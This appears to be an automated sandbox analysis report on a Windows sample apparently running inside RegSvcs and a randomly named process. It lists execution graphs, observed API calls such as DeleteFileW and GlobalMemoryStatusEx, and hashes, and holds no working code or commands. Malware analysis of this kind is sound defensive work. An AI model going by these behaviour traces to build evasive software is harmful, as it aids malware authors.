                                                                  execution_graph 44262 ccd01c 44263 ccd034 44262->44263 44264 ccd08e 44263->44264 44269 5e1a0c4 44263->44269 44278 5e1d0c8 44263->44278 44282 5e1e218 44263->44282 44291 5e1d0b7 44263->44291 44270 5e1a0cf 44269->44270 44271 5e1e289 44270->44271 44273 5e1e279 44270->44273 44311 5e1a18c 44271->44311 44295 5e1e3a0 44273->44295 44300 5e1e47c 44273->44300 44306 5e1e3b0 44273->44306 44274 5e1e287 44279 5e1d0ee 44278->44279 44280 5e1a0c4 CallWindowProcW 44279->44280 44281 5e1d10f 44280->44281 44281->44264 44285 5e1e228 44282->44285 44283 5e1e289 44284 5e1a18c CallWindowProcW 44283->44284 44287 5e1e287 44284->44287 44285->44283 44286 5e1e279 44285->44286 44288 5e1e3a0 CallWindowProcW 44286->44288 44289 5e1e3b0 CallWindowProcW 44286->44289 44290 5e1e47c CallWindowProcW 44286->44290 44288->44287 44289->44287 44290->44287 44292 5e1d0c5 44291->44292 44293 5e1a0c4 CallWindowProcW 44292->44293 44294 5e1d10f 44293->44294 44294->44264 44297 5e1e3b0 44295->44297 44296 5e1e450 44296->44274 44315 5e1e468 44297->44315 44318 5e1e458 44297->44318 44301 5e1e43a 44300->44301 44302 5e1e48a 44300->44302 44304 5e1e468 CallWindowProcW 44301->44304 44305 5e1e458 CallWindowProcW 44301->44305 44303 5e1e450 44303->44274 44304->44303 44305->44303 44308 5e1e3c4 44306->44308 44307 5e1e450 44307->44274 44309 5e1e468 CallWindowProcW 44308->44309 44310 5e1e458 CallWindowProcW 44308->44310 44309->44307 44310->44307 44312 5e1a197 44311->44312 44313 5e1f6ea CallWindowProcW 44312->44313 44314 5e1f699 44312->44314 44313->44314 44314->44274 44316 5e1e479 44315->44316 44322 5e1f620 44315->44322 44316->44296 44319 5e1e468 44318->44319 44320 5e1f620 CallWindowProcW 44319->44320 44321 5e1e479 44319->44321 44320->44321 44321->44296 44323 5e1a18c CallWindowProcW 44322->44323 44324 5e1f63a 44323->44324 44324->44316 44246 5e12800 44247 5e12846 GetCurrentProcess 44246->44247 44249 5e12891 44247->44249 44250 5e12898 GetCurrentThread 44247->44250 44249->44250 44251 5e128d5 GetCurrentProcess 44250->44251 44252 5e128ce 44250->44252 44253 5e1290b 44251->44253 44252->44251 44254 5e12933 GetCurrentThreadId 44253->44254 44255 5e12964 44254->44255 44325 5e1cf10 44326 5e1cf78 CreateWindowExW 44325->44326 44328 5e1d034 44326->44328 44256 5e12a48 DuplicateHandle 44257 5e12ade 44256->44257 44258 d27358 44259 d2735c DeleteFileW 44258->44259 44261 d273d7 44259->44261 44329 d20848 44331 d2084e 44329->44331 44330 d2091b 44331->44330 44335 d21390 44331->44335 44339 5e116f8 44331->44339 44343 5e116e8 44331->44343 44336 d21375 44335->44336 44337 d21393 44335->44337 44336->44331 44337->44336 44347 d27530 44337->44347 44340 5e116fc 44339->44340 44362 5e110d0 44340->44362 44344 5e116f8 44343->44344 44345 5e110d0 GetModuleHandleW 44344->44345 44346 5e11728 44345->44346 44346->44331 44348 d2753a 44347->44348 44349 d27554 44348->44349 44352 5e2d6d0 44348->44352 44357 5e2d6f8 44348->44357 44349->44337 44354 5e2d6d5 44352->44354 44353 5e2d922 44353->44349 44354->44353 44355 5e2d948 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44354->44355 44356 5e2d938 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44354->44356 44355->44354 44356->44354 44359 5e2d70d 44357->44359 44358 5e2d922 44358->44349 44359->44358 44360 5e2d948 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44359->44360 44361 5e2d938 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44359->44361 44360->44359 44361->44359 44363 5e110db 44362->44363 44366 5e1256c 44363->44366 44365 5e130ae 44367 5e12577 44366->44367 44368 5e137d4 44367->44368 44371 5e15060 44367->44371 44375 5e1505f 44367->44375 44368->44365 44373 5e15081 44371->44373 44372 5e150a5 44372->44368 44373->44372 44379 5e15210 44373->44379 44376 5e15081 44375->44376 44377 5e150a5 44376->44377 44378 5e15210 GetModuleHandleW 44376->44378 44377->44368 44378->44377 44380 5e1521d 44379->44380 44381 5e15256 44380->44381 44383 5e13574 44380->44383 44381->44372 44384 5e1357f 44383->44384 44386 5e156c8 44384->44386 44387 5e15268 44384->44387 44388 5e15273 44387->44388 44394 5e15278 44388->44394 44390 5e15737 44398 5e1aa48 44390->44398 44404 5e1aa60 44390->44404 44391 5e15771 44391->44386 44396 5e15283 44394->44396 44395 5e169c0 44395->44390 44396->44395 44397 5e15060 GetModuleHandleW 44396->44397 44397->44395 44400 5e1aa91 44398->44400 44401 5e1aadd 44398->44401 44399 5e1aa9d 44399->44391 44400->44399 44410 5e1acc8 44400->44410 44414 5e1acd8 44400->44414 44401->44391 44406 5e1aa91 44404->44406 44407 5e1aadd 44404->44407 44405 5e1aa9d 44405->44391 44406->44405 44408 5e1acc8 GetModuleHandleW 44406->44408 44409 5e1acd8 GetModuleHandleW 44406->44409 44407->44391 44408->44407 44409->44407 44411 5e1acd8 44410->44411 44417 5e1ad18 44411->44417 44412 5e1ace2 44412->44401 44416 5e1ad18 GetModuleHandleW 44414->44416 44415 5e1ace2 44415->44401 44416->44415 44419 5e1ad1d 44417->44419 44418 5e1ad5c 44418->44412 44419->44418 44420 5e1af60 GetModuleHandleW 44419->44420 44421 5e1af8d 44420->44421 44421->44412

                                                                  Executed Functions

                                                                  Function 05E127FA Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1269 5e127fa-5e1288f GetCurrentProcess 1273 5e12891-5e12897 1269->1273 1274 5e12898-5e128cc GetCurrentThread 1269->1274 1273->1274 1275 5e128d5-5e12909 GetCurrentProcess 1274->1275 1276 5e128ce-5e128d4 1274->1276 1278 5e12912-5e1292d call 5e129d0 1275->1278 1279 5e1290b-5e12911 1275->1279 1276->1275 1282 5e12933-5e12962 GetCurrentThreadId 1278->1282 1279->1278 1283 5e12964-5e1296a 1282->1283 1284 5e1296b-5e129cd 1282->1284 1283->1284
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E1287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E128BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E128F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E12951
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: e845fce9ac1678d79c5db7bea06704b3e78e4559ac87d745196ae798b5dd7aef
                                                                  • Instruction ID: d75f54a8a62fe81be684340a9c70bc6dfc7c34ca57af0c7e185af7921513d232
                                                                  • Opcode Fuzzy Hash: e845fce9ac1678d79c5db7bea06704b3e78e4559ac87d745196ae798b5dd7aef
                                                                  • Instruction Fuzzy Hash: D05156B49002498FDB14DFAAD948BEEBBF1FF88314F24845AE509A7360DB385944CB65
                                                                  Function 05E12800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1291 5e12800-5e1288f GetCurrentProcess 1295 5e12891-5e12897 1291->1295 1296 5e12898-5e128cc GetCurrentThread 1291->1296 1295->1296 1297 5e128d5-5e12909 GetCurrentProcess 1296->1297 1298 5e128ce-5e128d4 1296->1298 1300 5e12912-5e1292d call 5e129d0 1297->1300 1301 5e1290b-5e12911 1297->1301 1298->1297 1304 5e12933-5e12962 GetCurrentThreadId 1300->1304 1301->1300 1305 5e12964-5e1296a 1304->1305 1306 5e1296b-5e129cd 1304->1306 1305->1306
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E1287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E128BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E128F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E12951
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: c787952447c15bfe130b28585f28cdf4a0120d37e016f39ebf921f2008ed260b
                                                                  • Instruction ID: 2e8c1d0e2c55e0b84d1b4e3c01c4bd99d04454caf4139fef700329a0c91881b0
                                                                  • Opcode Fuzzy Hash: c787952447c15bfe130b28585f28cdf4a0120d37e016f39ebf921f2008ed260b
                                                                  • Instruction Fuzzy Hash: 895157B09003498FDB14DFAAD948BDEBBF1FF88314F24805AE509A7360DB345944CB65
                                                                  Function 05E1AD18 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E1AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: bf67c02840f3cba49532e1053fdd115fd30abece59b8dbd3308486c7b8fee283
                                                                  • Instruction ID: 515a8942cf576930536b9a9d8746012fc13f66fcc0bd84745c715bd1ce926db6
                                                                  • Opcode Fuzzy Hash: bf67c02840f3cba49532e1053fdd115fd30abece59b8dbd3308486c7b8fee283
                                                                  • Instruction Fuzzy Hash: DA815AB0A01B058FD724DF29D0447AABBF5FF88304F00892ED896D7A50D774E845CB98
                                                                  Function 05E2E510 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212567405.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8ccb44f136d6ffc269342f08f19e79c04987780f3947685d45d3b837e02b9a2
                                                                  • Instruction ID: a4274ac28b35084e1d583f172e7f42346ad1fdeed1b15fb639e3ca8c3c5f5787
                                                                  • Opcode Fuzzy Hash: c8ccb44f136d6ffc269342f08f19e79c04987780f3947685d45d3b837e02b9a2
                                                                  • Instruction Fuzzy Hash: FE413571E147658FCB14CF69C8042EEBFF5AF89210F14856AD448A7241EB38D845CBD1
                                                                  Function 05E1CF04 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E1D022
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: a226a8a390e15eb80fc840a2b0c141c41c6bb2b608867fd9fb21ba646f473c66
                                                                  • Instruction ID: e4d911477ee708d43590f9a381b709598e5aae1dbf137bf05af711b7d6fcec0f
                                                                  • Opcode Fuzzy Hash: a226a8a390e15eb80fc840a2b0c141c41c6bb2b608867fd9fb21ba646f473c66
                                                                  • Instruction Fuzzy Hash: B851D1B1C00349DFDB14CFA9C984ADEBBB6FF48314F64812AE819AB210D7749885CF95
                                                                  Function 05E1CF10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E1D022
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 37a99427063c82129c1afa5f86d0995554d7557e61aa077f60d6e0c0f9a25abe
                                                                  • Instruction ID: e01872e18e0b888095bc86bf2986d93a8dc68e1dc43b14b08ec864df86d2d923
                                                                  • Opcode Fuzzy Hash: 37a99427063c82129c1afa5f86d0995554d7557e61aa077f60d6e0c0f9a25abe
                                                                  • Instruction Fuzzy Hash: A841E2B1C00309DFDB14CFA9C984ADEBBB6FF48304F64812AE819AB210D7749885CF94
                                                                  Function 05E1A18C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E1F711
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 701560f265e3d8425dc5bf344e03d198f8c3dc2f28f704aa86e2fb7e70fee7cd
                                                                  • Instruction ID: 47da82884269dd5ae229f8da0e54a4377cc217466d86153f9a2e32025d6d3801
                                                                  • Opcode Fuzzy Hash: 701560f265e3d8425dc5bf344e03d198f8c3dc2f28f704aa86e2fb7e70fee7cd
                                                                  • Instruction Fuzzy Hash: CE4127B9900205DFDB14CF99C888AAABBF6FF88314F248459D559AB321D774A841CFA4
                                                                  Function 05E12A40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E12ACF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 8f1dadee99be8bf09e0498d4d5ae7c154b752162aeebf7219654dabce980283f
                                                                  • Instruction ID: d1c6a39ba9e4e677372e2f140b115a4af2e1fdf9282a976f3c6593587b0fe7c4
                                                                  • Opcode Fuzzy Hash: 8f1dadee99be8bf09e0498d4d5ae7c154b752162aeebf7219654dabce980283f
                                                                  • Instruction Fuzzy Hash: 5521E2B5D002489FDB10CFAAD984ADEBBF5FB48310F14841AE958A7250D378A950CFA5
                                                                  Function 05E12A48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E12ACF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: a5a1883987de540a19fff5d868bdb2021e53a39dfa8db689fdb036cfd28c281c
                                                                  • Instruction ID: cd879dba704fb96e0648a747d102d376c6bc4c6ec4430800fb48d471bd9e0415
                                                                  • Opcode Fuzzy Hash: a5a1883987de540a19fff5d868bdb2021e53a39dfa8db689fdb036cfd28c281c
                                                                  • Instruction Fuzzy Hash: D821C2B5D002489FDB10CFAAD984ADEBBF9FB48310F14841AE958A7350D378A954CFA5
                                                                  Function 00D27351 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 00D273C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203908369.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: b37cc6775fc2a2d5aa355228f31b7bcaa34f2757f1038301f7782a99b332f53f
                                                                  • Instruction ID: 0f644cd2ba34df6368f90856236b3c952a3148fe778035119c03b9071b882b63
                                                                  • Opcode Fuzzy Hash: b37cc6775fc2a2d5aa355228f31b7bcaa34f2757f1038301f7782a99b332f53f
                                                                  • Instruction Fuzzy Hash: 442147B1C0066A9BCB20DF9AD4456AEFBB4EF48314F14816AD828A7640D778A944CFE5
                                                                  Function 00D27358 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 00D273C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203908369.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: d22abf089dc8a92df569b565ecd9f674e29d08045c507bab51007a4f03bae3ad
                                                                  • Instruction ID: 15f82c00ef6a0e44745ec017930e82478b2e3cf051b013850a9eb8885677f5e9
                                                                  • Opcode Fuzzy Hash: d22abf089dc8a92df569b565ecd9f674e29d08045c507bab51007a4f03bae3ad
                                                                  • Instruction Fuzzy Hash: 231147B1C006599BCB10DF9AD544BAEFBF4FF48320F14816AD818A7240D778A940CFE5
                                                                  Function 05E2D6C4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E2E562), ref: 05E2E64F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212567405.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: cfb3196f5454ea6fb3ac98d0db992b860827b08d363b193c71bb8633a60b4aa8
                                                                  • Instruction ID: 728c91f98184a2cc58238d237fd8281e36ecff2ff1eb0d33119e2e99376557eb
                                                                  • Opcode Fuzzy Hash: cfb3196f5454ea6fb3ac98d0db992b860827b08d363b193c71bb8633a60b4aa8
                                                                  • Instruction Fuzzy Hash: 4A1103B1C006699BCB10DF9AC445AEEFBF8EF48314F14816AE918A7240D778A950CFE5
                                                                  Function 05E2E5E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E2E562), ref: 05E2E64F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212567405.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: cbdb65f9b856470239f0c09fc43c8d7874248f952fceb7d3ea8cfe458061fd82
                                                                  • Instruction ID: 6782f40f882abf0daf7c8e72a9976f8395af920bd23a167ec9e87978f4b7a09d
                                                                  • Opcode Fuzzy Hash: cbdb65f9b856470239f0c09fc43c8d7874248f952fceb7d3ea8cfe458061fd82
                                                                  • Instruction Fuzzy Hash: 0A1142B1C006699BCB10DF9AC545BEEFBB4BF48320F10812AD818B7240D738A940CFA5
                                                                  Function 05E1AF18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E1AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 5006c753d94efd5652ee06bbe3f41b9b350c01361d6127f7bf2c7bba673c6148
                                                                  • Instruction ID: 7ea817e511077c1c563b5c1ec332140a30c5d5ca10cf0087a1bf16c7fd2b53a9
                                                                  • Opcode Fuzzy Hash: 5006c753d94efd5652ee06bbe3f41b9b350c01361d6127f7bf2c7bba673c6148
                                                                  • Instruction Fuzzy Hash: F71110B5C003498FDB10CF9AC444ADEFBF5EF88324F10842AD869A7200C379A545CFA5
                                                                  Function 00CCD01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203661039.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_ccd000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93dfb0b033979247e61bbd8bc579661056997c52e3a7de8886882d111240fde2
                                                                  • Instruction ID: 69f195ed6c97e046ec60a0b4e28a8b510467c5739bb30a03304688397a158e93
                                                                  • Opcode Fuzzy Hash: 93dfb0b033979247e61bbd8bc579661056997c52e3a7de8886882d111240fde2
                                                                  • Instruction Fuzzy Hash: 1121D071604204DFCB14DF28D9C4F26BBA5FB88314F20C5BDE94A4B296C33AD847CA62
                                                                  Function 00CCD005 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203661039.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_ccd000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab36d4c3a216d478ff4fd5ac5fbae3ecc547271dbd30c8bb73cb77cb3bedfa53
                                                                  • Instruction ID: 32d6d4d748bfdceb12833aee33b8526f8d40e862054f384d178cf8f31178ec30
                                                                  • Opcode Fuzzy Hash: ab36d4c3a216d478ff4fd5ac5fbae3ecc547271dbd30c8bb73cb77cb3bedfa53
                                                                  • Instruction Fuzzy Hash: EF2183755093808FD702CF24D594B15BF71EB46314F28C5EED8498B6A7C33A980ACB62

                                                                  Execution Graph

                                                                  Execution Coverage:8.6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:38
                                                                  Total number of Limit Nodes:7
                                                                  execution_graph 27188 d0acf0 27192 d0ade8 27188->27192 27197 d0add9 27188->27197 27189 d0acff 27193 d0ae1c 27192->27193 27194 d0adf9 27192->27194 27193->27189 27194->27193 27195 d0b020 GetModuleHandleW 27194->27195 27196 d0b04d 27195->27196 27196->27189 27198 d0adf9 27197->27198 27199 d0ae1c 27197->27199 27198->27199 27200 d0b020 GetModuleHandleW 27198->27200 27199->27189 27201 d0b04d 27200->27201 27201->27189 27212 d0d6c0 DuplicateHandle 27213 d0d756 27212->27213 27202 d0d478 27203 d0d4be GetCurrentProcess 27202->27203 27205 d0d510 GetCurrentThread 27203->27205 27208 d0d509 27203->27208 27206 d0d546 27205->27206 27207 d0d54d GetCurrentProcess 27205->27207 27206->27207 27211 d0d583 27207->27211 27208->27205 27209 d0d5ab GetCurrentThreadId 27210 d0d5dc 27209->27210 27211->27209 27214 d04668 27215 d0467a 27214->27215 27216 d04686 27215->27216 27218 d04779 27215->27218 27219 d0479d 27218->27219 27223 d04888 27219->27223 27227 d04879 27219->27227 27225 d048af 27223->27225 27224 d0498c 27224->27224 27225->27224 27231 d044d4 27225->27231 27229 d04888 27227->27229 27228 d0498c 27228->27228 27229->27228 27230 d044d4 CreateActCtxA 27229->27230 27230->27228 27232 d05918 CreateActCtxA 27231->27232 27234 d059db 27232->27234

                                                                  Executed Functions

                                                                  Function 00D0D468 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 294 d0d468-d0d507 GetCurrentProcess 298 d0d510-d0d544 GetCurrentThread 294->298 299 d0d509-d0d50f 294->299 300 d0d546-d0d54c 298->300 301 d0d54d-d0d581 GetCurrentProcess 298->301 299->298 300->301 303 d0d583-d0d589 301->303 304 d0d58a-d0d5a5 call d0d647 301->304 303->304 306 d0d5ab-d0d5da GetCurrentThreadId 304->306 308 d0d5e3-d0d645 306->308 309 d0d5dc-d0d5e2 306->309 309->308
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 00D0D533
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D0D5C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 6e1774f5d7ed346e64ba4046c81a5c2acd9b671c6e8c5272cb1c2e4e086a5918
                                                                  • Instruction ID: 6cd65a1046ad53632973b73fdd8d939e95f7ed8a7d7ab7cebb8d5482ff8b1299
                                                                  • Opcode Fuzzy Hash: 6e1774f5d7ed346e64ba4046c81a5c2acd9b671c6e8c5272cb1c2e4e086a5918
                                                                  • Instruction Fuzzy Hash: CD518AB09016098FDB14DFA9D9487AEBBF1FF49304F248459D409A73A0C7789944CF65
                                                                  Function 00D0D478 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 316 d0d478-d0d507 GetCurrentProcess 320 d0d510-d0d544 GetCurrentThread 316->320 321 d0d509-d0d50f 316->321 322 d0d546-d0d54c 320->322 323 d0d54d-d0d581 GetCurrentProcess 320->323 321->320 322->323 325 d0d583-d0d589 323->325 326 d0d58a-d0d5a5 call d0d647 323->326 325->326 328 d0d5ab-d0d5da GetCurrentThreadId 326->328 330 d0d5e3-d0d645 328->330 331 d0d5dc-d0d5e2 328->331 331->330
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 00D0D533
                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D0D5C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2224413292.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_d00000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: cee1a38c29851da9d1c14da273be6234438c8787e019c48dac14297b2eae52dc
                                                                  • Instruction ID: 796cc972378780c716982a13a76548945f9b475cb7b3d1d61e81e109ebe7e704
                                                                  • Opcode Fuzzy Hash: cee1a38c29851da9d1c14da273be6234438c8787e019c48dac14297b2eae52dc
                                                                  • Instruction Fuzzy Hash: 6A5179B09017098FDB14DFA9D948B9EBBF1FF89314F208459E409A73A0D7789984CF65
